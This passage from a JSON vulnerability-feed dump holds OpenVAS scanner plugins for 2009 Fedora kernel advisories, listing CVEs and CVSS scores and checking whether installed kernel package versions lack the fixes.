isrpmvuln(pkg:\"kernel-firmware\", rpm:\"kernel-firmware~2.6.27.29~170.2.79.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-bootwrapper\", rpm:\"kernel-bootwrapper~2.6.27.29~170.2.79.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-smp\", rpm:\"kernel-smp~2.6.27.29~170.2.79.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-smp-devel\", rpm:\"kernel-smp-devel~2.6.27.29~170.2.79.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-smp-debuginfo\", rpm:\"kernel-smp-debuginfo~2.6.27.29~170.2.79.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-25T10:56:58", "description": "The remote host is missing an update to kernel\nannounced via advisory FEDORA-2009-8647.", "cvss3": {}, "published": "2009-09-02T00:00:00", "type": "openvas", "title": "Fedora Core 10 FEDORA-2009-8647 (kernel)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2009-1895", "CVE-2009-2692", "CVE-2008-5079", "CVE-2009-0065", "CVE-2009-2407", "CVE-2009-2406", "CVE-2009-1897"], "modified": "2017-07-10T00:00:00", "id": "OPENVAS:64703", "href": "http://plugins.openvas.org/nasl.php?oid=64703", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: fcore_2009_8647.nasl 6624 2017-07-10 06:11:55Z cfischer $\n# Description: Auto-generated from advisory FEDORA-2009-8647 (kernel)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Update Information:\n\nFix sock_sendpage null pointer dereference. CVE-2009-2692.\n\nChangeLog:\n\n* Fri Aug 14 2009 Kyle McMartin 2.6.27.29-170.2.79\n- CVE-2009-2692: Fix sock sendpage NULL ptr deref.\n* Fri Jul 31 2009 Chuck Ebbert 2.6.27.29-170.2.78\n- The kernel package needs to override the new rpm %install behavior.\n* Thu Jul 30 2009 Chuck Ebbert 2.6.27.29-170.2.77\n- Linux 2.6.27.29\n* Wed Jul 29 2009 Chuck Ebbert 2.6.27.29-170.2.75.rc1\n- Linux 2.6.27.29-rc1 (CVE-2009-2406, CVE-2009-2407)\n- Drop linux-2.6-netdev-r8169-avoid-losing-msi-interrupts.patch, now in -stable.\n* Wed Jul 29 2009 Chuck Ebbert 2.6.27.28-170.2.74\n- Don't bounce virtio_blk requests (#510304)\";\ntag_solution = \"Apply the appropriate updates.\n\nThis update can be installed with the yum update program. Use \nsu -c 'yum update kernel' at the command line.\nFor more information, refer to Managing Software with yum,\navailable at http://docs.fedoraproject.org/yum/.\n\nhttps://secure1.securityspace.com/smysecure/catid.html?in=FEDORA-2009-8647\";\ntag_summary = \"The remote host is missing an update to kernel\nannounced via advisory FEDORA-2009-8647.\";\n\n\n\nif(description)\n{\n script_id(64703);\n script_version(\"$Revision: 6624 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 08:11:55 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-09-02 04:58:39 +0200 (Wed, 02 Sep 2009)\");\n script_cve_id(\"CVE-2009-2692\", \"CVE-2009-2406\", \"CVE-2009-2407\", \"CVE-2009-1895\", \"CVE-2009-1897\", \"CVE-2009-0065\", \"CVE-2008-5079\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Fedora Core 10 FEDORA-2009-8647 (kernel)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name : \"URL\" , value : \"https://bugzilla.redhat.com/show_bug.cgi?id=516949\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"kernel-headers\", rpm:\"kernel-headers~2.6.27.29~170.2.79.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~2.6.27.29~170.2.79.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-devel\", rpm:\"kernel-devel~2.6.27.29~170.2.79.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-debuginfo\", rpm:\"kernel-debuginfo~2.6.27.29~170.2.79.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-debuginfo-common\", rpm:\"kernel-debuginfo-common~2.6.27.29~170.2.79.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-PAE\", rpm:\"kernel-PAE~2.6.27.29~170.2.79.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-PAE-devel\", rpm:\"kernel-PAE-devel~2.6.27.29~170.2.79.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-PAEdebug\", rpm:\"kernel-PAEdebug~2.6.27.29~170.2.79.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-PAEdebug-devel\", rpm:\"kernel-PAEdebug-devel~2.6.27.29~170.2.79.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-debug\", rpm:\"kernel-debug~2.6.27.29~170.2.79.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-debug-devel\", rpm:\"kernel-debug-devel~2.6.27.29~170.2.79.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-PAE-debuginfo\", rpm:\"kernel-PAE-debuginfo~2.6.27.29~170.2.79.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-PAEdebug-debuginfo\", rpm:\"kernel-PAEdebug-debuginfo~2.6.27.29~170.2.79.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-debug-debuginfo\", rpm:\"kernel-debug-debuginfo~2.6.27.29~170.2.79.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-doc\", rpm:\"kernel-doc~2.6.27.29~170.2.79.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-firmware\", rpm:\"kernel-firmware~2.6.27.29~170.2.79.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-bootwrapper\", rpm:\"kernel-bootwrapper~2.6.27.29~170.2.79.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-smp\", rpm:\"kernel-smp~2.6.27.29~170.2.79.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-smp-devel\", rpm:\"kernel-smp-devel~2.6.27.29~170.2.79.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-smp-debuginfo\", rpm:\"kernel-smp-debuginfo~2.6.27.29~170.2.79.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-25T10:56:55", "description": "The remote host is missing an update to kernel\nannounced via advisory FEDORA-2009-9044.", "cvss3": {}, "published": "2009-09-02T00:00:00", "type": "openvas", "title": "Fedora Core 11 FEDORA-2009-9044 (kernel)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2009-1895", "CVE-2009-2692", "CVE-2009-2767", "CVE-2009-2407", "CVE-2009-2406", "CVE-2009-2848", "CVE-2009-1897", "CVE-2009-2695", "CVE-2009-2847", "CVE-2009-2849", "CVE-2009-2691"], "modified": "2017-07-10T00:00:00", "id": "OPENVAS:64736", "href": "http://plugins.openvas.org/nasl.php?oid=64736", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: fcore_2009_9044.nasl 6624 2017-07-10 06:11:55Z cfischer $\n# Description: Auto-generated from advisory FEDORA-2009-9044 (kernel)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Update Information:\n\nSecurity fixes:\n\n- CVE-2009-2691: Information disclosure in proc filesystem\n- CVE-2009-2848: execve: must clear current->child_tid\n- CVE-2009-2849: md: null pointer dereference\n- CVE-2009-2847: Information leak in do_sigaltstack\n\nRestore missing LIRC drivers, dropped in previous release.\nBackport upstream fixes that further improve the security of\nmmap of low addresses. (CVE-2009-2695)\n\nChangeLog:\n\n* Thu Sep 24(??!!) 2009 Chuck Ebbert 2.6.29.6-217.2.16\n- Fix CVE-2009-2691: local information disclosure in /proc\n* Fri Aug 21 2009 David Woodhouse \n- Fix b43 on iMac G5 (#514787)\n* Tue Aug 18 2009 Kyle McMartin \n- CVE-2009-2848: execve: must clear current->clear_child_tid\n- Cherry pick upstream commits 52dec22e739eec8f3a0154f768a599f5489048bd\nwhich improve mmap_min_addr.\n- CVE-2009-2849: md: avoid dereferencing null ptr when accessing suspend\nsysfs attributes.\n- CVE-2009-2847: do_sigaltstack: avoid copying 'stack_t' as a structure\nto userspace\";\ntag_solution = \"Apply the appropriate updates.\n\nThis update can be installed with the yum update program. Use \nsu -c 'yum update kernel' at the command line.\nFor more information, refer to Managing Software with yum,\navailable at http://docs.fedoraproject.org/yum/.\n\nhttps://secure1.securityspace.com/smysecure/catid.html?in=FEDORA-2009-9044\";\ntag_summary = \"The remote host is missing an update to kernel\nannounced via advisory FEDORA-2009-9044.\";\n\n\n\nif(description)\n{\n script_id(64736);\n script_version(\"$Revision: 6624 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 08:11:55 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-09-02 04:58:39 +0200 (Wed, 02 Sep 2009)\");\n script_cve_id(\"CVE-2009-2691\", \"CVE-2009-2848\", \"CVE-2009-2849\", \"CVE-2009-2847\", \"CVE-2009-2695\", \"CVE-2009-2767\", \"CVE-2009-2692\", \"CVE-2009-1897\", \"CVE-2009-1895\", \"CVE-2009-2406\", \"CVE-2009-2407\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Fedora Core 11 FEDORA-2009-9044 (kernel)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name : \"URL\" , value : \"https://bugzilla.redhat.com/show_bug.cgi?id=516171\");\n script_xref(name : \"URL\" , value : \"https://bugzilla.redhat.com/show_bug.cgi?id=515423\");\n script_xref(name : \"URL\" , value : \"https://bugzilla.redhat.com/show_bug.cgi?id=518132\");\n script_xref(name : \"URL\" , value : \"https://bugzilla.redhat.com/show_bug.cgi?id=515392\");\n script_xref(name : \"URL\" , value : \"https://bugzilla.redhat.com/show_bug.cgi?id=517830\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~2.6.29.6~217.2.16.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-devel\", rpm:\"kernel-devel~2.6.29.6~217.2.16.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-headers\", rpm:\"kernel-headers~2.6.29.6~217.2.16.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-debuginfo\", rpm:\"kernel-debuginfo~2.6.29.6~217.2.16.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-debuginfo-common\", rpm:\"kernel-debuginfo-common~2.6.29.6~217.2.16.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-PAE\", rpm:\"kernel-PAE~2.6.29.6~217.2.16.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-PAE-devel\", rpm:\"kernel-PAE-devel~2.6.29.6~217.2.16.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-PAEdebug\", rpm:\"kernel-PAEdebug~2.6.29.6~217.2.16.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-PAEdebug-devel\", rpm:\"kernel-PAEdebug-devel~2.6.29.6~217.2.16.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-PAE-debuginfo\", rpm:\"kernel-PAE-debuginfo~2.6.29.6~217.2.16.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-PAEdebug-debuginfo\", rpm:\"kernel-PAEdebug-debuginfo~2.6.29.6~217.2.16.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-doc\", rpm:\"kernel-doc~2.6.29.6~217.2.16.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-firmware\", rpm:\"kernel-firmware~2.6.29.6~217.2.16.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-bootwrapper\", rpm:\"kernel-bootwrapper~2.6.29.6~217.2.16.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-smp\", rpm:\"kernel-smp~2.6.29.6~217.2.16.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-smp-devel\", rpm:\"kernel-smp-devel~2.6.29.6~217.2.16.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-smp-debuginfo\", rpm:\"kernel-smp-debuginfo~2.6.29.6~217.2.16.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-debug\", rpm:\"kernel-debug~2.6.29.6~217.2.16.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-debug-devel\", rpm:\"kernel-debug-devel~2.6.29.6~217.2.16.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-debug-debuginfo\", rpm:\"kernel-debug-debuginfo~2.6.29.6~217.2.16.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-04-06T11:39:47", "description": "The remote host is missing an update to kernel\nannounced via advisory FEDORA-2009-9044.", "cvss3": {}, "published": "2009-09-02T00:00:00", "type": "openvas", "title": "Fedora Core 11 FEDORA-2009-9044 (kernel)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2009-1895", "CVE-2009-2692", "CVE-2009-2767", "CVE-2009-2407", "CVE-2009-2406", "CVE-2009-2848", "CVE-2009-1897", "CVE-2009-2695", "CVE-2009-2847", "CVE-2009-2849", "CVE-2009-2691"], "modified": "2018-04-06T00:00:00", "id": "OPENVAS:136141256231064736", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231064736", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: fcore_2009_9044.nasl 9350 2018-04-06 07:03:33Z cfischer $\n# Description: Auto-generated from advisory FEDORA-2009-9044 (kernel)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Update Information:\n\nSecurity fixes:\n\n- CVE-2009-2691: Information disclosure in proc filesystem\n- CVE-2009-2848: execve: must clear current->child_tid\n- CVE-2009-2849: md: null pointer dereference\n- CVE-2009-2847: Information leak in do_sigaltstack\n\nRestore missing LIRC drivers, dropped in previous release.\nBackport upstream fixes that further improve the security of\nmmap of low addresses. (CVE-2009-2695)\n\nChangeLog:\n\n* Thu Sep 24(??!!) 2009 Chuck Ebbert 2.6.29.6-217.2.16\n- Fix CVE-2009-2691: local information disclosure in /proc\n* Fri Aug 21 2009 David Woodhouse \n- Fix b43 on iMac G5 (#514787)\n* Tue Aug 18 2009 Kyle McMartin \n- CVE-2009-2848: execve: must clear current->clear_child_tid\n- Cherry pick upstream commits 52dec22e739eec8f3a0154f768a599f5489048bd\nwhich improve mmap_min_addr.\n- CVE-2009-2849: md: avoid dereferencing null ptr when accessing suspend\nsysfs attributes.\n- CVE-2009-2847: do_sigaltstack: avoid copying 'stack_t' as a structure\nto userspace\";\ntag_solution = \"Apply the appropriate updates.\n\nThis update can be installed with the yum update program. Use \nsu -c 'yum update kernel' at the command line.\nFor more information, refer to Managing Software with yum,\navailable at http://docs.fedoraproject.org/yum/.\n\nhttps://secure1.securityspace.com/smysecure/catid.html?in=FEDORA-2009-9044\";\ntag_summary = \"The remote host is missing an update to kernel\nannounced via advisory FEDORA-2009-9044.\";\n\n\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.64736\");\n script_version(\"$Revision: 9350 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-09-02 04:58:39 +0200 (Wed, 02 Sep 2009)\");\n script_cve_id(\"CVE-2009-2691\", \"CVE-2009-2848\", \"CVE-2009-2849\", \"CVE-2009-2847\", \"CVE-2009-2695\", \"CVE-2009-2767\", \"CVE-2009-2692\", \"CVE-2009-1897\", \"CVE-2009-1895\", \"CVE-2009-2406\", \"CVE-2009-2407\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Fedora Core 11 FEDORA-2009-9044 (kernel)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name : \"URL\" , value : \"https://bugzilla.redhat.com/show_bug.cgi?id=516171\");\n script_xref(name : \"URL\" , value : \"https://bugzilla.redhat.com/show_bug.cgi?id=515423\");\n script_xref(name : \"URL\" , value : \"https://bugzilla.redhat.com/show_bug.cgi?id=518132\");\n script_xref(name : \"URL\" , value : \"https://bugzilla.redhat.com/show_bug.cgi?id=515392\");\n script_xref(name : \"URL\" , value : \"https://bugzilla.redhat.com/show_bug.cgi?id=517830\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~2.6.29.6~217.2.16.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-devel\", rpm:\"kernel-devel~2.6.29.6~217.2.16.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-headers\", rpm:\"kernel-headers~2.6.29.6~217.2.16.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-debuginfo\", rpm:\"kernel-debuginfo~2.6.29.6~217.2.16.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-debuginfo-common\", rpm:\"kernel-debuginfo-common~2.6.29.6~217.2.16.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-PAE\", rpm:\"kernel-PAE~2.6.29.6~217.2.16.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-PAE-devel\", rpm:\"kernel-PAE-devel~2.6.29.6~217.2.16.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-PAEdebug\", rpm:\"kernel-PAEdebug~2.6.29.6~217.2.16.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-PAEdebug-devel\", rpm:\"kernel-PAEdebug-devel~2.6.29.6~217.2.16.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-PAE-debuginfo\", rpm:\"kernel-PAE-debuginfo~2.6.29.6~217.2.16.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-PAEdebug-debuginfo\", rpm:\"kernel-PAEdebug-debuginfo~2.6.29.6~217.2.16.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-doc\", rpm:\"kernel-doc~2.6.29.6~217.2.16.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-firmware\", rpm:\"kernel-firmware~2.6.29.6~217.2.16.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-bootwrapper\", rpm:\"kernel-bootwrapper~2.6.29.6~217.2.16.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-smp\", rpm:\"kernel-smp~2.6.29.6~217.2.16.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-smp-devel\", rpm:\"kernel-smp-devel~2.6.29.6~217.2.16.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-smp-debuginfo\", rpm:\"kernel-smp-debuginfo~2.6.29.6~217.2.16.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-debug\", rpm:\"kernel-debug~2.6.29.6~217.2.16.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-debug-devel\", rpm:\"kernel-debug-devel~2.6.29.6~217.2.16.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-debug-debuginfo\", rpm:\"kernel-debug-debuginfo~2.6.29.6~217.2.16.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-25T10:56:09", "description": "The remote host is missing an update to kernel\nannounced via advisory FEDORA-2009-10165.", "cvss3": {}, "published": "2009-10-06T00:00:00", "type": "openvas", "title": "Fedora Core 10 FEDORA-2009-10165 (kernel)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2009-1895", "CVE-2009-2692", "CVE-2009-3001", "CVE-2008-5079", "CVE-2009-3290", "CVE-2009-0065", "CVE-2009-2407", "CVE-2009-3002", "CVE-2009-2406", "CVE-2009-2903", "CVE-2009-1897", "CVE-2009-2847"], "modified": "2017-07-10T00:00:00", "id": "OPENVAS:64999", "href": "http://plugins.openvas.org/nasl.php?oid=64999", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: fcore_2009_10165.nasl 6624 2017-07-10 06:11:55Z cfischer $\n# Description: Auto-generated from advisory FEDORA-2009-10165 (kernel)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Update Information:\n\nUpdate to kernel 